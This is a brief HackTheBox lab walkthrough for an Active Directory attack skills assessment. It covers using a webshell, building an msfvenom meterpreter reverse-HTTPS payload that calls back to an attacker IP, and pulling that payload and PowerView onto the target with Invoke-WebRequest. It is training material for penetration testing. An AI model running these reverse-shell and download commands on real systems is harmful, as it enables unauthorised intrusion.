HTB AD Enumeration & Attacks - Skills Assessment Part I

Browsing the uploads folder, we get the webshell.

We can directly get the flag from the desktop.

Kerberoast an account with the SPN MSSQLSvc/SQL01.inlanefreight.local:1433 and submit the account name as your answer

Now we need more interactive shell. So we will be using metasploit to gain back a shell.

msfvenom -p windows/x64/meterpreter/reverse_https lhost=10.10.14.52 -f exe -o backupscript.exe LPORT=4444

Run the following command to upload the file.

Invoke-WebRequest -Uri "http://10.10.14.52:8000/backupscript.exe " -OutFile "C:\windows\system32\inetsrv\backup.exe"

Now run it

we will get the shell

Now we need to upload the tools

Invoke-WebRequest -Uri "http://10.10.14.124:8000/PowerView.ps1 " -OutFile "C:\PowerView.ps1"

PreviousAdditional AD Auditing TechniquesNextWeb Pentesting

Last updated